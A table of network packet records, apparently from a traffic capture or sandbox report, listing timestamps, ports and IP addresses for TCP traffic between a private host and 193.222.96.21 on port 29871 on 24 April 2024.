Apr 24, 2024 07:13:21.794547081 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.794555902 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.794595003 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.794642925 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.794687986 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.794745922 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.794792891 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.795073986 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795140028 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795186043 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.795196056 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795244932 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795291901 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.795317888 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795372963 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795409918 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795418978 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.795557976 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795607090 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.795614004 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795651913 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795697927 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.795876026 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795949936 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.795996904 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.796174049 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796317101 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796375990 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.796390057 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796447992 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796484947 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796494961 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.796610117 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796658993 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.796709061 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796782970 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796819925 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796830893 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.796933889 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.796983004 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.796997070 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.797038078 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.797089100 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.797689915 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.797859907 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.797908068 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.797944069 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.797982931 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798032045 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.798038006 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798103094 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798151970 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.798177004 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798291922 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798329115 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798338890 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.798439026 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798486948 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.798497915 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798553944 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798593044 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798602104 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.798652887 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798690081 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798696041 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.798760891 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798799038 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798805952 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.798876047 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798912048 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.798922062 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.798970938 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799009085 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799021959 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.799130917 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799192905 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.799475908 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799592018 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799642086 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.799706936 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799774885 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799823999 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.799844027 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799901962 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799940109 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.799949884 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.799998999 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800046921 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.800059080 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800170898 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800220013 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.800242901 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800288916 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800334930 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.800338030 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800401926 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800441980 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.800460100 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800530910 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800578117 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.800632000 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800669909 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800717115 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.800724030 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800760984 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800800085 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800805092 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.800837994 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800883055 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.800884962 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800941944 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.800987959 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.800988913 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801044941 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801090956 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.801099062 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801153898 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801204920 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.801209927 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801281929 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801327944 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.801327944 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801377058 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801430941 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801441908 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.801510096 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801553011 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.801570892 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801609039 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801647902 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.801717997 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801775932 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801820993 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.801832914 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801872969 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801917076 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.801944017 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.801997900 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802042007 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.802071095 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802118063 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802167892 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.802167892 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802237034 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802284002 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.802284956 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802323103 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802366972 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.802475929 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802562952 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802608013 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.802699089 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802773952 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802812099 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802819967 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.802908897 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.802958965 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.802977085 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803041935 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803090096 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.803107977 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803148031 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803189039 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.803200960 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803260088 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803297997 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803307056 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.803356886 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803404093 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803406000 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.803472042 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803515911 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803525925 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.803608894 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803663015 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.803663015 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803724051 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803776026 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.803802967 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803859949 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803910017 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.803913116 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.803972960 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804020882 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.804047108 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804086924 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804141998 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.804171085 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804217100 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804264069 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.804284096 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804322004 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804364920 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.804379940 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804434061 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804482937 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.804486990 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804541111 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804589033 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.804610968 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804649115 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804686069 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804691076 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.804723978 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.804765940 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.102722883 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.102844954 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.102884054 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.102901936 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.102940083 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.102982998 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.102996111 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103055000 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103096962 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.103110075 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103167057 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103209019 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.103221893 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103260040 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103297949 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.103317022 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103374004 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103419065 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.103429079 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103466988 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103522062 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103524923 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.103579044 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103616953 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103626013 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.103677988 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103722095 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.103840113 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103888988 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103934050 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.103946924 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.103985071 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104028940 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.104043961 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104187012 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104237080 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.104254961 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104294062 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104341984 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.104356050 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104429007 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104474068 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.104501009 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104540110 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104577065 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:22.104585886 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:22.147903919 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:23.943320036 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:24.242907047 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:24.242925882 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:24.243108988 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:24.243172884 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:24.243257046 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:24.243302107 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:24.546278000 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:24.577111006 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:24.577234983 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:25.027153969 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:25.029620886 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:36.213520050 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:36.217880011 CEST | 49713 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:36.573879004 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:14:07.013395071 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:14:07.015937090 CEST | 49713 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:14:07.370501041 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:14:37.945065022 CEST | 29871 | 49713 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:14:37.946700096 CEST | 49713 | 29871 | 192.168.2.9 | 193.222.96.21 |
